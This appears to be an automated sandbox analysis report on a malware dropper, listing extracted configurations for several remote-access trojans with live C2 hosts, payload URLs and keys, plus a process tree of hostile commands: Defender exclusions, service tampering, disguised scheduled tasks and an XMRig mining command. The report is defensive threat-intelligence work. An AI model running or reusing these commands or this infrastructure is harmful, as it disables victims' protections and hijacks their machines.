Overview

overview

10

Static

static

10

New Text D...od.exe

windows7-x64

10

New Text D...od.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    69s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-01-2025 04:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    761KB

  • MD5

    c6040234ee8eaedbe618632818c3b1b3

  • SHA1

    68115f8c3394c782aa6ba663ac78695d2b80bf75

  • SHA256

    bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

  • SHA512

    a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I

Score
10/10
asyncratquasarremcosxmrigxredxwormdefaultfuckoffice04schoolbackdoordiscoveryevasionexecutionminerpersistenceratspywarestealertrojanupx

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

remcos

Botnet

fuck

C2

republicadominica2025.ip-ddns.com:30202

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    rostad

  • mouse_option

    false

  • mutex

    iwebfiewbfihbewlfkm-WH4782

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

quasar

Version

1.3.0.0

Botnet

School

C2

gamwtonxristo.ddns.net:1717

Mutex

QSR_MUTEX_M3Vba1npfJg3Ale25C

Attributes
  • encryption_key

    VtojWKM7f1XyCVdB41wL

  • install_name

    comctl32.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Defender Startup Scan

  • subdirectory

    Windows Defender

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

0.tcp.in.ngrok.io:14296

193.161.193.99:20466
Mutex

cc827307-beb6-456e-b5dd-e28a204ebd45

Attributes
  • encryption_key

    93486CAE624EBAD6626412E4A7DC6221B139DAA8

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

XukSoXxFQFDQJQvq

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    System.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

2.tcp.eu.ngrok.io:19695

Mutex

gonq3XlXWgiz

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Xworm Payload 2 IoCs
  • Quasar RAT 7 IoCs

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 6 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Xmrig family
    xmrig
  • Xred

    Xred is backdoor written in Delphi.

    backdoorxred
  • Xred family
    xred
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 14 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 54 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Power Settings 1 TTPs 12 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 24 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 50 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Quasar RAT
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1112
    • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe
        "C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users', 'C:\ProgramData'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4376
        • C:\Fasyer\lopads.exe
          "C:\Fasyer\lopads.exe"
          4⤵
          • Executes dropped EXE
          PID:4816
      • C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe
        "C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:1112
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:4448
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            5⤵
              PID:2296
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            4⤵
            • Launches sc.exe
            PID:3028
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            4⤵
            • Launches sc.exe
            PID:3308
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            4⤵
            • Launches sc.exe
            PID:3240
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            4⤵
            • Launches sc.exe
            PID:3400
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            4⤵
            • Launches sc.exe
            PID:3056
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1628
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:728
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:3492
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:5044
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
            4⤵
            • Launches sc.exe
            PID:4744
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
            4⤵
            • Launches sc.exe
            PID:1440
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            4⤵
            • Launches sc.exe
            PID:3872
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
            4⤵
            • Launches sc.exe
            PID:740
        • C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
          "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4756
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4988
          • C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
            "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:996
            • C:\Windows\SysWOW64\schtasks.exe
              "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2460
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gplQ0IiucTw7.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4360
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2096
              • C:\Windows\SysWOW64\PING.EXE
                ping -n 10 localhost
                6⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:3140
              • C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
                "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:5264
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:5404
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J8tCFjSdT62f.bat" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5516
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1196
                  • C:\Windows\SysWOW64\PING.EXE
                    ping -n 10 localhost
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:5000
                  • C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
                    "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
                    8⤵
                      PID:5652
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 2212
                    7⤵
                    • Program crash
                    PID:5548
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 2228
                5⤵
                • Program crash
                PID:4300
        • C:\ProgramData\Synaptics\Synaptics.exe
          "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
            "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2736
            • C:\Users\Admin\AppData\Local\Temp\a\Updater.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Updater.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:988
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users'"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4856
            • C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe
              "C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2636
              • C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe
                "C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"
                5⤵
                • Executes dropped EXE
                PID:1200
            • C:\Users\Admin\AppData\Local\Temp\a\fuck.exe
              "C:\Users\Admin\AppData\Local\Temp\a\fuck.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1984
            • C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe
              "C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2556
            • C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3032
              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3300
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 2000
                  6⤵
                  • Program crash
                  PID:5160
            • C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1912
              • C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe
                "C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:3284
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\13ad6dcf-4910-42bb-bff7-ec9477a501e7.bat"
                  6⤵
                    PID:5344
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      7⤵
                        PID:5448
                      • C:\Windows\system32\taskkill.exe
                        taskkill /F /PID 3284
                        7⤵
                        • Kills process with taskkill
                        PID:5616
                      • C:\Windows\system32\timeout.exe
                        timeout /T 2 /NOBREAK
                        7⤵
                        • Delays execution with timeout.exe
                        PID:4564
                • C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1768
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2452
                • C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1864
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3064
                  • C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
                    "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1908
                    • C:\Windows\SYSTEM32\schtasks.exe
                      "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
                      6⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:4760
                • C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Maps connected drives based on registry
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Enumerates system info in registry
                  PID:2972
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1204
                  • C:\Windows\SYSTEM32\SCHTASKS.exe
                    SCHTASKS /CREATE /TN "System-cb832607b4" /TR "C:\Windows\System32\System-cb832607b4.exe" /SC ONLOGON /RL HIGHEST /F
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:380
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe
                    5⤵
                    • Suspicious use of SetThreadContext
                    PID:5636
                    • C:\Windows\System32\powercfg.exe
                      powercfg -change standby-timeout-ac 0
                      6⤵
                      • Power Settings
                      PID:6004
                    • C:\Windows\System32\powercfg.exe
                      powercfg -change monitor-timeout-ac 0
                      6⤵
                      • Power Settings
                      PID:6012
                    • C:\Windows\System32\powercfg.exe
                      powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
                      6⤵
                      • Power Settings
                      PID:6020
                    • C:\Windows\System32\powercfg.exe
                      powercfg /setactive SCHEME_CURRENT
                      6⤵
                      • Power Settings
                      PID:6028
                    • C:\Windows\System32\Wbem\wmic.exe
                      wmic diskdrive get serialnumber
                      6⤵
                        PID:6036
                      • C:\Windows\System32\Wbem\wmic.exe
                        wmic diskdrive get serialnumber
                        6⤵
                          PID:5172
                        • C:\Windows\System32\curl.exe
                          curl -s https://api.ipify.org
                          6⤵
                            PID:3452
                          • C:\Windows\System32\curl.exe
                            curl -s http://ipinfo.io/country
                            6⤵
                              PID:5188
                            • C:\Windows\System32\curl.exe
                              curl -s https://api.ipify.org
                              6⤵
                                PID:5548
                              • C:\Windows\System32\Wbem\wmic.exe
                                wmic diskdrive get serialnumber
                                6⤵
                                  PID:5808
                                • C:\Windows\System32\curl.exe
                                  curl -s http://ipinfo.io/country
                                  6⤵
                                    PID:5916
                                  • C:\Windows\System32\svchost.exe
                                    "C:\Windows\System32\svchost.exe" --algo rx/0 --url xmr-us-east1.nanopool.org:10300 --user 455XKVg4JQh4Xc2bjPBWb2Uv1jhxvJnJAWWWWN3puzwtJP85MCHyuBFaZ5SL1nXGgqeoijsLjwNqSdAAJ4zrLNLnB3J7DXj/lunar --cpu-max-threads-hint=100
                                    6⤵
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5728
                                • C:\Windows\SysWOW64\explorer.exe
                                  "C:\Windows\SysWOW64\explorer.exe"
                                  5⤵
                                    PID:5752
                                  • C:\Windows\SysWOW64\explorer.exe
                                    "C:\Windows\SysWOW64\explorer.exe"
                                    5⤵
                                      PID:1480
                                    • C:\Windows\SysWOW64\explorer.exe
                                      "C:\Windows\SysWOW64\explorer.exe"
                                      5⤵
                                        PID:3820
                                      • C:\Windows\SysWOW64\explorer.exe
                                        "C:\Windows\SysWOW64\explorer.exe"
                                        5⤵
                                          PID:2148
                                        • C:\Windows\SysWOW64\explorer.exe
                                          "C:\Windows\SysWOW64\explorer.exe"
                                          5⤵
                                            PID:1336
                                          • C:\Windows\SysWOW64\explorer.exe
                                            "C:\Windows\SysWOW64\explorer.exe"
                                            5⤵
                                              PID:5316
                                            • C:\Windows\SysWOW64\explorer.exe
                                              "C:\Windows\SysWOW64\explorer.exe"
                                              5⤵
                                                PID:5468
                                              • C:\Windows\SysWOW64\explorer.exe
                                                "C:\Windows\SysWOW64\explorer.exe"
                                                5⤵
                                                  PID:5512
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                  5⤵
                                                    PID:5536
                                                  • C:\Windows\SysWOW64\explorer.exe
                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                    5⤵
                                                      PID:5400
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      "C:\Windows\SysWOW64\explorer.exe"
                                                      5⤵
                                                        PID:5700
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                        5⤵
                                                          PID:5764
                                                        • C:\Windows\SysWOW64\explorer.exe
                                                          "C:\Windows\SysWOW64\explorer.exe"
                                                          5⤵
                                                            PID:5960
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                            5⤵
                                                              PID:5836
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              "C:\Windows\SysWOW64\explorer.exe"
                                                              5⤵
                                                                PID:5856
                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                "C:\Windows\SysWOW64\explorer.exe"
                                                                5⤵
                                                                  PID:5760
                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                  5⤵
                                                                    PID:5260
                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                    5⤵
                                                                      PID:5672
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      "C:\Windows\SysWOW64\explorer.exe"
                                                                      5⤵
                                                                        PID:6080
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                        5⤵
                                                                          PID:6024
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          "C:\Windows\SysWOW64\explorer.exe"
                                                                          5⤵
                                                                            PID:6020
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                            5⤵
                                                                              PID:6060
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              "C:\Windows\SysWOW64\explorer.exe"
                                                                              5⤵
                                                                                PID:6004
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                "C:\Windows\SysWOW64\explorer.exe"
                                                                                5⤵
                                                                                  PID:5144
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                  5⤵
                                                                                    PID:6036
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                    5⤵
                                                                                      PID:1888
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      "C:\Windows\SysWOW64\explorer.exe"
                                                                                      5⤵
                                                                                        PID:2652
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                        5⤵
                                                                                          PID:5180
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          "C:\Windows\SysWOW64\explorer.exe"
                                                                                          5⤵
                                                                                            PID:3100
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                            5⤵
                                                                                              PID:4560
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              "C:\Windows\SysWOW64\explorer.exe"
                                                                                              5⤵
                                                                                                PID:824
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                "C:\Windows\SysWOW64\explorer.exe"
                                                                                                5⤵
                                                                                                  PID:1128
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                                  5⤵
                                                                                                    PID:5368
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                                    5⤵
                                                                                                      PID:3592
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      "C:\Windows\SysWOW64\explorer.exe"
                                                                                                      5⤵
                                                                                                        PID:5428
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\mac.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4044
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
